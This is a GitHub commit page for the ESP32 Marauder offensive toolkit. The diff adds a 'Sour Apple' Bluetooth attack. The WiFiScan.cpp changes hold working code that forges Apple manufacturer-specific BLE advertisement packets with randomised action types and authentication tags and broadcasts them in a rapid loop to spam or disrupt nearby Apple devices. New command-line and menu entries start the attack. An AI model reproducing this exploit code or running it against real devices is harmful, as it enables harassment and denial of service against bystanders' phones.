Skip to content

Commit

Permalink
Add sour apple to Marauder
Browse files Browse the repository at this point in the history
  • Loading branch information
justcallmekoko committed Oct 12, 2023
1 parent ad6addf commit 1d6ff6f
Show file tree
Hide file tree
Showing 8 changed files with 130 additions and 3 deletions.
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,7 @@
<!---[![Build Status](https://travis-ci.com/justcallmekoko/ESP32Marauder.svg?branch=master)](https://travis-ci.com/justcallmekoko/ESP32Marauder)--->
<!---Shields/Badges https://shields.io/--->

# ESP32 Marauder v0.12.1
# ESP32 Marauder v0.13.0
<p align="center"><img alt="Marauder logo" src="https://github.com/justcallmekoko/ESP32Marauder/blob/master/pictures/marauder3L.jpg?raw=true" width="300"></p>
<p align="center">
<b>A suite of WiFi/Bluetooth offensive and defensive tools for the ESP32</b>
Expand Down
13 changes: 13 additions & 0 deletions esp32_marauder/CommandLine.cpp
Original file line number Diff line number Diff line change
Expand Up @@ -249,6 +249,7 @@ void CommandLine::runCommand(String input) {
// Bluetooth sniff/scan
#ifdef HAS_BT
Serial.println(HELP_BT_SNIFF_CMD);
Serial.println(HELP_BT_SOUR_APPLE_CMD);
#ifdef HAS_GPS
Serial.println(HELP_BT_WARDRIVE_CMD);
#endif
Expand Down Expand Up @@ -771,6 +772,18 @@ void CommandLine::runCommand(String input) {
Serial.println("Bluetooth not supported");
#endif
}
else if (cmd_args.get(0) == BT_SOUR_APPLE_CMD) {
#ifdef HAS_BT
Serial.println("Starting Sour Apple attack. Stop with " + (String)STOPSCAN_CMD);
#ifdef HAS_SCREEN
display_obj.clearScreen();
menu_function_obj.drawStatusBar();
#endif
wifi_scan_obj.StartScan(BT_ATTACK_SOUR_APPLE, TFT_GREEN);
#else
Serial.println("Bluetooth not supported");
#endif
}
// Wardrive
else if (cmd_args.get(0) == BT_WARDRIVE_CMD) {
#ifdef HAS_BT
Expand Down
2 changes: 2 additions & 0 deletions esp32_marauder/CommandLine.h
Original file line number Diff line number Diff line change
Expand Up @@ -77,6 +77,7 @@ const char PROGMEM SSID_CMD[] = "ssid";

// Bluetooth sniff/scan
const char PROGMEM BT_SNIFF_CMD[] = "sniffbt";
const char PROGMEM BT_SOUR_APPLE_CMD[] = "sourapple";
const char PROGMEM BT_WARDRIVE_CMD[] = "btwardrive";
const char PROGMEM BT_SKIM_CMD[] = "sniffskim";

Expand Down Expand Up @@ -122,6 +123,7 @@ const char PROGMEM HELP_SSID_CMD_B[] = "ssid -r <index>";

// Bluetooth sniff/scan
const char PROGMEM HELP_BT_SNIFF_CMD[] = "sniffbt";
const char PROGMEM HELP_BT_SOUR_APPLE_CMD[] = "sourapple";
const char PROGMEM HELP_BT_WARDRIVE_CMD[] = "btwardrive [-c]";
const char PROGMEM HELP_BT_SKIM_CMD[] = "sniffskim";
const char PROGMEM HELP_FOOT[] = "==================================";
Expand Down
18 changes: 18 additions & 0 deletions esp32_marauder/MenuFunctions.cpp
Original file line number Diff line number Diff line change
Expand Up @@ -494,6 +494,7 @@ void MenuFunctions::main(uint32_t currentTime)
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_RICK_ROLL) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_ALL) ||
(wifi_scan_obj.currentScanMode == BT_ATTACK_SOUR_APPLE) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS))
Expand Down Expand Up @@ -550,6 +551,7 @@ void MenuFunctions::main(uint32_t currentTime)
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_RICK_ROLL) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_ALL) ||
(wifi_scan_obj.currentScanMode == BT_ATTACK_SOUR_APPLE) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS) ||
Expand Down Expand Up @@ -1073,6 +1075,7 @@ void MenuFunctions::RunSetup()

// Bluetooth menu stuff
bluetoothSnifferMenu.list = new LinkedList<MenuNode>();
bluetoothAttackMenu.list = new LinkedList<MenuNode>();

// Settings stuff
generateSSIDsMenu.list = new LinkedList<MenuNode>();
Expand All @@ -1095,6 +1098,7 @@ void MenuFunctions::RunSetup()
wifiAttackMenu.name = text_table1[21];
wifiGeneralMenu.name = text_table1[22];
bluetoothSnifferMenu.name = text_table1[23];
bluetoothAttackMenu.name = "Bluetooth Attacks";
generateSSIDsMenu.name = text_table1[27];
clearSSIDsMenu.name = text_table1[28];
clearAPsMenu.name = text_table1[29];
Expand Down Expand Up @@ -1371,6 +1375,9 @@ void MenuFunctions::RunSetup()
this->addNodes(&bluetoothMenu, text_table1[31], TFT_YELLOW, NULL, SNIFFERS, [this]() {
this->changeMenu(&bluetoothSnifferMenu);
});
this->addNodes(&bluetoothMenu, "Bluetooth Attacks", TFT_RED, NULL, ATTACKS, [this]() {
this->changeMenu(&bluetoothAttackMenu);
});

// Build bluetooth sniffer Menu
bluetoothSnifferMenu.parentMenu = &bluetoothMenu; // Second Menu is third menu parent
Expand Down Expand Up @@ -1402,6 +1409,17 @@ void MenuFunctions::RunSetup()
wifi_scan_obj.StartScan(BT_SCAN_SKIMMERS, TFT_MAGENTA);
});

// Bluetooth Attack menu
bluetoothAttackMenu.parentMenu = &bluetoothMenu; // Second Menu is third menu parent
this->addNodes(&bluetoothAttackMenu, text09, TFT_LIGHTGREY, NULL, 0, [this]() {
this->changeMenu(bluetoothAttackMenu.parentMenu);
});
this->addNodes(&bluetoothAttackMenu, "Sour Apple", TFT_GREEN, NULL, DEAUTH_SNIFF, [this]() {
display_obj.clearScreen();
this->drawStatusBar();
wifi_scan_obj.StartScan(BT_ATTACK_SOUR_APPLE, TFT_GREEN);
});

// Device menu
deviceMenu.parentMenu = &mainMenu;
this->addNodes(&deviceMenu, text09, TFT_LIGHTGREY, NULL, 0, [this]() {
Expand Down
1 change: 1 addition & 0 deletions esp32_marauder/MenuFunctions.h
Original file line number Diff line number Diff line change
Expand Up @@ -144,6 +144,7 @@ class MenuFunctions

// Bluetooth menu stuff
Menu bluetoothSnifferMenu;
Menu bluetoothAttackMenu;

// Settings things menus
Menu generateSSIDsMenu;
Expand Down
92 changes: 91 additions & 1 deletion esp32_marauder/WiFiScan.cpp
Original file line number Diff line number Diff line change
Expand Up @@ -18,6 +18,36 @@ extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32
}

#ifdef HAS_BT
//ESP32 Sour Apple by RapierXbox
//Exploit by ECTO-1A
NimBLEAdvertising *pAdvertising;

NimBLEAdvertisementData getOAdvertisementData() {
NimBLEAdvertisementData randomAdvertisementData = NimBLEAdvertisementData();
uint8_t packet[17];
uint8_t size = 17;
uint8_t i = 0;

packet[i++] = size - 1; // Packet Length
packet[i++] = 0xFF; // Packet Type (Manufacturer Specific)
packet[i++] = 0x4C; // Packet Company ID (Apple, Inc.)
packet[i++] = 0x00; // ...
packet[i++] = 0x0F; // Type
packet[i++] = 0x05; // Length
packet[i++] = 0xC1; // Action Flags
const uint8_t types[] = { 0x27, 0x09, 0x02, 0x1e, 0x2b, 0x2d, 0x2f, 0x01, 0x06, 0x20, 0xc0 };
packet[i++] = types[rand() % sizeof(types)]; // Action Type
esp_fill_random(&packet[i], 3); // Authentication Tag
i += 3;
packet[i++] = 0x00; // ???
packet[i++] = 0x00; // ???
packet[i++] = 0x10; // Type ???
esp_fill_random(&packet[i], 3);

randomAdvertisementData.addData(std::string((char *)packet, 17));
return randomAdvertisementData;
}

class bluetoothScanAllCallback: public BLEAdvertisedDeviceCallbacks {

void onResult(BLEAdvertisedDevice *advertisedDevice) {
Expand Down Expand Up @@ -412,6 +442,11 @@ void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color)
RunBluetoothScan(scan_mode, color);
#endif
}
else if (scan_mode == BT_ATTACK_SOUR_APPLE) {
#ifdef HAS_BT
RunSourApple(scan_mode, color);
#endif
}
else if ((scan_mode == BT_SCAN_WAR_DRIVE) ||
(scan_mode == BT_SCAN_WAR_DRIVE_CONT)) {
#ifdef HAS_BT
Expand Down Expand Up @@ -515,10 +550,11 @@ bool WiFiScan::shutdownWiFi() {
bool WiFiScan::shutdownBLE() {
#ifdef HAS_BT
if (this->ble_initialized) {
pAdvertising->stop();
pBLEScan->stop();

pBLEScan->clearResults();
BLEDevice::deinit();
NimBLEDevice::deinit();

#ifdef MARAUDER_FLIPPER
flipper_led.offLED();
Expand Down Expand Up @@ -574,6 +610,7 @@ void WiFiScan::StopScan(uint8_t scan_mode)


else if ((currentScanMode == BT_SCAN_ALL) ||
(currentScanMode == BT_ATTACK_SOUR_APPLE) ||
(currentScanMode == BT_SCAN_WAR_DRIVE) ||
(currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
(currentScanMode == BT_SCAN_SKIMMERS))
Expand Down Expand Up @@ -1359,6 +1396,15 @@ void WiFiScan::RunPwnScan(uint8_t scan_mode, uint16_t color)
initTime = millis();
}

void WiFiScan::executeSourApple() {
delay(40);
NimBLEAdvertisementData advertisementData = getOAdvertisementData();
pAdvertising->setAdvertisementData(advertisementData);
pAdvertising->start();
delay(20);
pAdvertising->stop();
}

void WiFiScan::executeWarDrive() {
#ifdef HAS_GPS
if (gps_obj.getGpsModuleStatus()) {
Expand Down Expand Up @@ -1708,6 +1754,31 @@ void WiFiScan::RunProbeScan(uint8_t scan_mode, uint16_t color)
initTime = millis();
}

void WiFiScan::RunSourApple(uint8_t scan_mode, uint16_t color) {
#ifdef HAS_BT
NimBLEDevice::init("");
NimBLEServer *pServer = NimBLEDevice::createServer();

pAdvertising = pServer->getAdvertising();

#ifdef HAS_SCREEN
display_obj.TOP_FIXED_AREA_2 = 48;
display_obj.tteBar = true;
display_obj.print_delay_1 = 15;
display_obj.print_delay_2 = 10;
display_obj.initScrollValues(true);
display_obj.tft.setTextWrap(false);
display_obj.tft.setTextColor(TFT_BLACK, color);
display_obj.tft.fillRect(0,16,240,16, color);
display_obj.tft.drawCentreString("Sour Apple",120,16,2);
display_obj.touchToExit();
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
#endif

this->ble_initialized;
#endif
}

// Function to start running any BLE scan
void WiFiScan::RunBluetoothScan(uint8_t scan_mode, uint16_t color)
{
Expand Down Expand Up @@ -4033,6 +4104,25 @@ void WiFiScan::main(uint32_t currentTime)
channelHop();
}
}
else if (currentScanMode == BT_ATTACK_SOUR_APPLE) {
#ifdef HAS_BT
if (currentTime - initTime >= 1000) {
initTime = millis();
String displayString = "";
String displayString2 = "";
displayString.concat("Advertising Data...");
for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
displayString2.concat(" ");
#ifdef HAS_SCREEN
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
display_obj.showCenterText(displayString2, 160);
display_obj.showCenterText(displayString, 160);
#endif
}

this->executeSourApple();
#endif
}
else if (currentScanMode == WIFI_SCAN_WAR_DRIVE) {
if (currentTime - initTime >= this->channel_hop_delay * 1000)
{
Expand Down
3 changes: 3 additions & 0 deletions esp32_marauder/WiFiScan.h
Original file line number Diff line number Diff line change
Expand Up @@ -81,6 +81,7 @@
#define WIFI_SCAN_STATION_WAR_DRIVE 33
#define BT_SCAN_WAR_DRIVE 34
#define BT_SCAN_WAR_DRIVE_CONT 35
#define BT_ATTACK_SOUR_APPLE 36

#define GRAPH_REFRESH 100

Expand Down Expand Up @@ -249,6 +250,7 @@ class WiFiScan
void save_mac(unsigned char* mac);
void clearMacHistory();
void executeWarDrive();
void executeSourApple();
void startWardriverWiFi();

void startWiFiAttacks(uint8_t scan_mode, uint16_t color, String title_string);
Expand Down Expand Up @@ -281,6 +283,7 @@ class WiFiScan
void RunProbeScan(uint8_t scan_mode, uint16_t color);
void RunPacketMonitor(uint8_t scan_mode, uint16_t color);
void RunBluetoothScan(uint8_t scan_mode, uint16_t color);
void RunSourApple(uint8_t scan_mode, uint16_t color);
void RunLvJoinWiFi(uint8_t scan_mode, uint16_t color);
void RunEvilPortal(uint8_t scan_mode, uint16_t color);
bool checkMem();
Expand Down
2 changes: 1 addition & 1 deletion esp32_marauder/configs.h
Original file line number Diff line number Diff line change
Expand Up @@ -22,7 +22,7 @@
//#define XIAO_ESP32_S3
//// END BOARD TARGETS

#define MARAUDER_VERSION "v0.12.2"
#define MARAUDER_VERSION "v0.13.0"

//// BOARD FEATURES
#ifdef MARAUDER_M5STICKC
Expand Down

0 comments on commit 1d6ff6f

Please sign in to comment.